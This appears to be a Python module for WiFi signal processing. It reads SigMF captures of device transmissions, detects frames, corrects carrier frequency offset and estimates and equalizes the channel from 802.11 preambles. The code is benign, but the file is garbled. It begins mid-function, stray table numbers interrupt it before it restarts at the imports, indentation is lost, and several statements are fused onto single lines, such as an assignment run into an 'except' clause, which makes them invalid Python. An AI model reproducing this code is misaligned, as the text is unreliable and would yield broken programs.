Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
# # Sanity check
# Ltf_1_eq = Ltf
# Ltf_2_eq = Ltf
# Stf_1_eq = Stf_64
# Stf_2_eq = Stf_64
if verbose is True:
Stf_1_eq_down = Stf_1_eq[ind_all]
Stf_2_eq_down = Stf_2_eq[ind_all]
Ltf_1_eq_down = Ltf_1_eq[ind_all]
Ltf_2_eq_down = Ltf_2_eq[ind_all]
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq_down.real, Stf_1_eq_down.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq_down.real, Stf_2_eq_down.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq_down.real, Ltf_1_eq_down.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq_down.real, Ltf_2_eq_down.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
# ipdb.set_trace()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
# preamble_eq = np.concatenate((stf_1_eq[:-(N//2)], stf_1_eq, stf_2_eq, ltf_1_eq[:-(N//2)], ltf_1_eq, ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-(N//4):], stf_1_eq, stf_2_eq[-(N//4):], stf_2_eq, ltf_1_eq[-(N//2):], ltf_1_eq, ltf_2_eq))
# import pdb
# pdb.set_trace()
# shift = freq_offset['shift_coarse']
# df1 = freq_offset['carrier_coarse']
# df2 = freq_offset['carrier_fine']
# preamble_eq_offset = preamble_eq.copy()
# Add in coarse carrier freq offset, taking the shift into account
# if shift>=0:
# preamble_eq_offset[shift:] = preamble_eq[shift:] * np.exp(1j*np.arange(0,preamble_eq.size - shift)*df1).flatten()
# else:
# preamble_eq_offset= preamble_eq * np.exp(1j*(np.arange(0, preamble_eq.size)+shift)*df1).flatten()
# # Add in fine carrier freq offset
# preamble_eq_offset *= np.exp(1j*np.arange(0, preamble_eq.size)*df2).flatten()
# return preamble_eq, preamble_eq_offset
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160
n_long = 160
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# sig3 = preamble[np.int(n_short/2):n_short-16].conj().copy()
# sig4 = preamble[np.int(n_short/2)+16:n_short].copy()
# df1 = 1/16 * np.angle(sig3.dot(sig4.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# sig5 = preamble[n_short+32:n_short+32+64].conj().copy()
# sig6 = preamble[n_short+64+32:n_short+n_long].reshape(1,-1).copy()
# df2 = 1/64 * np.angle(sig5.dot(sig6.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
# ------------------------------------------------------------------------
# LTI channel estimation (with delay spread <= length of cyclic prefix)
# ------------------------------------------------------------------------
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
L = 16
N = 64
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
# Ltf_mid_rx = Ltf_avg_rx
AA = np.zeros((N, N)) + 0j
for m in range(N):
for n in range(L+1):
AA[m, n] = Ltf[m] * np.exp(-1j*2*np.pi*m*n/N)
A = AA[:, :L+1] * np.exp(1j*np.pi*np.arange(L+1)).reshape(1, -1)
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
mask_data_pilots = np.ones(64)
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data_pilots = ind_all[mask_data_pilots == 1]
h_hat_small, residuals, rank, singular_values = np.linalg.lstsq(
A[ind_data_pilots, :], Ltf_mid_rx[ind_data_pilots], rcond=None)
h_hat = np.zeros(N)+0j
h_hat[:L+1] = h_hat_small
# h_hat = np.roll(h_hat, -np.int(L/2))
H_hat = fftshift(fft(h_hat))
H_hat = Ltf_avg_rx*Ltf
if verbose is True:
freq = np.arange(-32, 32)
H_hat_coarse = Ltf_mid_rx*Ltf
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
# plt.stem(freq, np.unwrap(np.angle(H_hat)))
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
# plt.stem(np.unwrap(np.angle(h_hat)))
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
# plt.stem(freq, np.unwrap(np.angle(H_hat)))
plt.stem(freq, np.angle(H_hat))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Frequency domain least squares estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
# plt.stem(np.unwrap(np.angle(h_hat)))
plt.stem(np.angle(h_hat))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Frequency domain least squares estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
# plt.show()
# ----------------------------------------------------
# Preamble equalization
# ----------------------------------------------------
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
ind_pilots = np.array([-21, -7, 7, 21]) + 32
mask_data = np.ones(64)
mask_data_pilots = np.ones(64)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data = ind_all[mask_data == 1]
ind_data_pilots = ind_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
# # Sanity check
# Ltf_1_eq = Ltf
# Ltf_2_eq = Ltf
# Stf_1_eq = Stf_64
# Stf_2_eq = Stf_64
if verbose is True:
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq.real, Stf_1_eq.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq.real, Stf_2_eq.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq.real, Ltf_1_eq.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq.real, Ltf_2_eq.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-32:], stf_1_eq, stf_2_eq, ltf_1_eq[-32:], ltf_1_eq, ltf_2_eq))
# shift = freq_offset['shift_coarse']
# df1 = freq_offset['carrier_coarse']
# df2 = freq_offset['carrier_fine']
# preamble_eq_offset = preamble_eq.copy()
# Add in coarse carrier freq offset, taking the shift into account
# if shift>=0:
# preamble_eq_offset[shift:] = preamble_eq[shift:] * np.exp(1j*np.arange(0,preamble_eq.size - shift)*df1).flatten()
# else:
# preamble_eq_offset= preamble_eq * np.exp(1j*(np.arange(0, preamble_eq.size)+shift)*df1).flatten()
# # Add in fine carrier freq offset
# preamble_eq_offset *= np.exp(1j*np.arange(0, preamble_eq.size)*df2).flatten()
# return preamble_eq, preamble_eq_offset
return preamble_eq
def rms(x):
# Root mean squared value
return np.sqrt(np.mean(x * np.conjugate(x)))
def shift_frequency(vector, freq_shift, fs):
# Shift frequency of time-series signal by specified amount
# vector: complex time-series signal
# freq_shift: frequency shift amount
# fs: sampling frequency of complex signal
t = np.arange(0, np.size(vector)) / fs # define time axis
# Sqrt(2) factor ensures that the power of the frequency downconverted signal
# is equal to the power of its passband counterpart
modulation = np.exp(-1j * 2 * np.pi * freq_shift * t) / np.sqrt(2) # frequency shift factor
return vector * modulation # baseband signal
def resample(vector, fs, dfs):
# Resample signal from original sample rate to desired sample rate
# fs: original sampling frequency
# dfs: desired sampling frequency
fs = int(round(fs)) # convert to integers
dfs = int(round(dfs))
cfs = lcm(fs, dfs) # common sampling frequency
if cfs > fs:
# Upsample from start-Hz to common-Hz
vector = resampy.resample(vector, fs, cfs, filter='kaiser_best')
# Downsample from common-Hz to desired-Hz
return resampy.resample(vector, cfs, dfs, filter='kaiser_best')
def lcm(a, b):
# Least common multiple of a and b
return a * int(b / fractions.gcd(a, b)) if a and b else 0
def get_sliding_window(x, window_size=10, stride=1, fs=200e6, fs_natural=20e6):
shape_ = x.shape
window_size_samples = np.int(window_size * (fs/fs_natural))
stride_samples = np.int(stride * (fs/fs_natural))
# sliding_window = [None] * ((shape_[1]-100+10)//10)
for i in tqdm(np.arange(0, shape_[1] - window_size_samples + stride_samples, stride_samples)):
if i == 0:
y = x[:, i:i + window_size_samples, :].copy()
else:
y = np.concatenate((y, x[:, i:i + window_size_samples, :]), axis=0)
return y
def read_wifi(files, base_data_directory, device_map, progress=True):
'''
Read wifi data frin data directory
'''
csv = files['csv_objects'].items()
if progress is True:
csv = tqdm(csv)
data_dict = dict(signal={}, device_key={}, # Complex signal and device label [0, N-1] from device_map
sample_rate={}, capture_sample_rate={}, capture_frequency={}, capture_hw={},
center_frequency={}, freq_lower_edge={}, freq_upper_edge={},
reference_number={}, data_file={}, sample_start={}, sample_count={},
device_type={}, device_id={}, device_manufacturer={}
)
signal_index = 0
for file, signal_list in csv:
# Example:
# file = 'adsb_gfi_3_dataset/10_sigmf_files_dataset/A-23937.sigmf-data'
# signal_list = ['A-23937-34', 'A-23937-54']
# check to see if the first character in "file" is a slash:
while file[0] == '/' or file[0] == '\\':
file = file[1:]
# if 'Windows' in platform():
# file = file.replace("/", "\\")
data_file = os.path.join(base_data_directory, file)
metadata_file = data_file.replace('sigmf-data', 'sigmf-meta')
all_signals = json.load(open(metadata_file))
capture = dict(capture_sample_rate=all_signals['global']['core:sample_rate'],
sample_rate=all_signals['global']['core:sample_rate'],
capture_hw=all_signals['global']['core:hw'],
capture_frequency=all_signals['capture'][0]['core:frequency'],
data_file=data_file)
for signal_name in signal_list:
# data_dict['reference_number'][signal_index] = signal_name
for key, value in capture.items():
data_dict[key][signal_index] = value
capture_properties = all_signals['capture']
signal_properties = get_json_signal(
all_signals['annotations'], capture_properties[0], signal_name, type='wifi')
for key, value in signal_properties.items():
data_dict[key][signal_index] = value
device_id = signal_properties['device_id']
data_dict['device_key'][signal_index] = device_map[device_id]
filename = data_dict['data_file'][signal_index]
start_sample = data_dict['sample_start'][signal_index]
sample_count = data_dict['sample_count'][signal_index]
data, buffer_start, buffer_end = read_sample(
filename, start_sample, sample_count, desired_buffer=0)
data_dict['signal'][signal_index] = data
data_dict['center_frequency'][signal_index] = data_dict['capture_frequency'][signal_index]
# ipdb.set_trace()
signal_index = signal_index + 1
return data_dict
def parse_input_files(input_csv, devices_csv):
'''
Parser for wifi dataset
'''
device_list = [] # a list of the devices to be trained/tested with
device_map = {} # a reverse map from device name to index
csv_objects = {} # a dictionary with filenames for keys, lists of signals as values
with open(devices_csv) as devices_csv_file:
devices_reader = csv.reader(devices_csv_file, delimiter=',')
for device in devices_reader:
device_list.append(device[0])
for i, device in enumerate(device_list):
device_map[device] = i
with open(input_csv) as input_csv_file:
input_reader = csv.reader(input_csv_file, delimiter=',')
for row in input_reader:
csv_objects[row[0]] = row[1:]
return {'device_list': device_list,
'device_map': device_map,
'csv_objects': csv_objects}
def get_json_signal(json_annotations, capture, signal_id, type=None):
'''
Get signal from json
'''
for signal in json_annotations:
if signal != {} and signal['capture_details:signal_reference_number'] == signal_id:
if 'rfml:label' in signal:
signal_label = signal['rfml:label']
if type is None:
type = signal_label[0]
else:
signal_label = tuple(None, None, None)
if type is None:
type = "unknown"
if type == "wifi":
return {'freq_lower_edge': signal['core:freq_lower_edge'],
'freq_upper_edge': signal['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_manufacturer': signal_label[1],
'device_id': signal_label[2]}
elif type == "ADS-B":
return{'snr': signal['capture_details:SNRdB'],
'reference_number': signal['capture_details:signal_reference_number'],
'freq_lower_edge': capture['core:freq_lower_edge'],
'freq_upper_edge': capture['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_id': signal_label[1]}
else:
print('Unknown signal type', type)
return None
return None
def read_sample(filename, start_sample, sample_count, desired_buffer):
'''
Read samples
'''
buffer_start = min(desired_buffer, start_sample)
buffer_end = desired_buffer
sample_count += (buffer_start + buffer_end)
with open(filename, "rb") as f:
# Seek to startSample
f.seek((start_sample - buffer_start) * 4) # 4bytes per sample (2x16 bit ints)
# Read in as ints
raw = np.fromfile(f, dtype='int16', count=2*sample_count)
samples_read = int(raw.size / 2)
buffer_end -= (sample_count - samples_read)
# Convert interleaved ints into two planes, real and imaginary
array = raw.reshape([samples_read, 2])
# convert the array to complex
array = array[:, 0] + 1j*array[:, 1]
return array, buffer_start, buffer_end
| 40.755221
| 174
| 0.55426
|
import numpy as np
import os
import json
import csv
import math
import fractions
import resampy
from tqdm import tqdm, trange
import matplotlib
import matplotlib.pyplot as plt
from scipy.fftpack import fft, ifft, fftshift, ifftshift
import ipdb
from sklearn.preprocessing import normalize
def preprocess_wifi(data_dict, sample_duration, sample_rate, preprocess_type=1, progress=True):
signal_indices = range(len(data_dict['data_file']))
if progress is True:
signal_indices = tqdm(signal_indices)
flag = 0
for i in signal_indices:
signal = data_dict['signal'][i]
orig_sample_rate = data_dict['capture_sample_rate'][i]
start_index = 0
end_index = math.ceil(sample_duration * orig_sample_rate)
if orig_sample_rate == np.int(200e6):
if (preprocess_type == 2) or (preprocess_type == 3):
lowFreq = data_dict['freq_lower_edge'][i]
upFreq = data_dict['freq_upper_edge'][i]
Fc = data_dict['capture_frequency'][i]
signal, flag_i = detect_frame(signal, lowFreq, upFreq, Fc, verbose=False)
flag = flag + flag_i
if preprocess_type == 3:
signal = frac_eq_preamble(signal)
start_index = np.int(start_index)
end_index = np.int(end_index)
if (preprocess_type == 1) or (preprocess_type == 2) or (orig_sample_rate != np.int(200e6)):
signal = signal[start_index:end_index]
with np.errstate(all='raise'):
try:
signal = signal / rms(signal) except FloatingPointError:
try:
signal += 1.0/np.sqrt(2*signal.size) + 1.0/np.sqrt(2*signal.size)*1j
except FloatingPointError:
signal_size = end_index - start_index
signal = np.ones([signal_size]) * (1.0 + 1.0*1j)/np.sqrt(2*signal_size)
if (preprocess_type == 1) or (orig_sample_rate != np.int(200e6)):
freq_shift = (data_dict['freq_upper_edge'][i] +
data_dict['freq_lower_edge'][i])/2 - data_dict['capture_frequency'][i]
signal = shift_frequency(signal, freq_shift, orig_sample_rate)
signal = resample(signal, orig_sample_rate, sample_rate)
if (preprocess_type == 2):
signal = resample(signal, orig_sample_rate, sample_rate)
data_dict['signal'][i] = signal
data_dict['center_frequency'][i] = (
data_dict['freq_upper_edge'][i] + data_dict['freq_lower_edge'][i])/2.
data_dict['sample_rate'][i] = sample_rate
if (preprocess_type == 2) or (preprocess_type == 3):
print('Successful frame detection on {:.2f}% of signals'.format(
100.0-flag*100.0/len(data_dict['data_file'])))
return data_dict
def frac_eq_preamble(rx, verbose=False):
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
stf_64 = ifft(ifftshift(Stf_64))
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
ltf = ifft(ifftshift(Ltf))
tx = np.concatenate((stf_64[:-32], stf_64, stf_64, ltf[-32:], ltf, ltf))
L = 160
N = 320
rx = rx.reshape([-1, 1])
R = np.zeros([L, L]) + 0j
p = np.zeros([L, 1]) + 0j
for i in range(N):
j = 10*i
R += rx[j:j+L].dot(rx[j:j+L].conj().T)
p += rx[j:j+L] * tx[i].conj()
c, residuals, rank, sing = np.linalg.lstsq(R, p)
signal_eq = np.zeros([N, 1]) + 0j
for i in range(N):
j = 10*i
signal_eq[i] = rx[j:j+L].T.dot(c.conj())
return signal_eq.flatten()
def detect_frame(complex_signal, lowFreq, upFreq, Fc, verbose=False):
Fs = 200e6
flag = 0
N = complex_signal.shape[0]
if N % 2 != 0:
complex_signal = complex_signal[:-1]
N -= 1
low_ind = np.int((lowFreq-Fc)*(N/Fs) + N/2)
up_ind = np.int((upFreq-Fc)*(N/Fs) + N/2)
lag = np.int((-Fc + (lowFreq+upFreq)/2)*(N/Fs) + N/2) - np.int(N/2)
X = fftshift(fft(complex_signal))
X[:low_ind] = 0 + 0j
X[up_ind:] = 0 + 0j
X = np.roll(X, -lag)
complex_signal = ifft(ifftshift(X))
guard_band_upsamp = np.int(2e-6*Fs) n_win = 1600-160 lag = 160
search_length_stf_upsamp = min(2*guard_band_upsamp+1, np.int(complex_signal.size))
autocorr_stf_upsamp = np.zeros(search_length_stf_upsamp)
a = np.zeros(search_length_stf_upsamp)+0j
p = np.zeros(search_length_stf_upsamp)
for n in range(search_length_stf_upsamp):
sig1 = complex_signal[n:n+n_win].reshape(1, -1)
sig2 = complex_signal[n+lag:n+n_win+lag].conj().reshape(1, -1)
a[n] = sig1.dot(sig2.T)
p[n] = np.sqrt(np.sum(np.abs(sig1)**2)*np.sum(np.abs(sig2)**2))
autocorr_stf_upsamp = np.abs(a)/p
frame_start_autocorr_upsamp = np.argmax(autocorr_stf_upsamp)
n_short_upsamp = 1600
if frame_start_autocorr_upsamp <= 2*guard_band_upsamp:
if verbose == True:
print('Autocorr prediction = {}'.format(frame_start_autocorr_upsamp))
else:
if verbose == True:
print('Autocorr detection failed\n Prediction = {}'.format(frame_start_autocorr_upsamp))
frame_start_autocorr_upsamp = guard_band_upsamp
flag = 1
return complex_signal[frame_start_autocorr_upsamp:], flag
def offset_compensate_preamble(preamble_in, fs=200e6, verbose=False, option=1):
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600 n_long = 1600
L = 160 N = 640
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160 n_long = 160
L = 16 N = 64
sig3 = preamble[np.int(n_short/2):n_short-L].conj().copy()
sig4 = preamble[np.int(n_short/2)+L:n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
sig5 = preamble[n_short+32:n_short+32+N].conj().copy()
sig6 = preamble[n_short+N+32:n_short+n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
if option == 1:
return preamble
elif option == 2:
return preamble, freq_offset
else:
raise NotImplementedError
def get_residuals_preamble(preamble_in, fs, method='subtraction', channel_method='frequency', verbose=False, label=''):
preamble = preamble_in.copy()
preamble_orig = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
cfo_total = np.multiply(np.exp(1j*np.arange(0, preamble.size)*df1).flatten(),
np.exp(1j*np.arange(0, preamble.size)*df2).flatten())
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
Ltf_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Ltf, np.zeros(32*9) + 1j * np.zeros(32*9)))
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf
h_hat = np.roll(ifft(ifftshift(H_hat)), -N//2)
if channel_method == 'time':
ltf_interpolated = ifft(ifftshift(Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * (np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[
N//2-1:-N//2])/rms(np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[N//2-1:-N//2])
elif channel_method == 'frequency':
ltf_interpolated = ifft(ifftshift(H_hat * Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(H_hat * Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * np.concatenate((stf_total, ltf_total))
if method == 'division':
residuals = preamble_orig/(preamble_constructed+0.001)
elif method == 'subtraction':
residuals = preamble_orig - preamble_constructed
return residuals, preamble_constructed
def basic_equalize_preamble(preamble_in, fs, verbose=False, label=''):
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
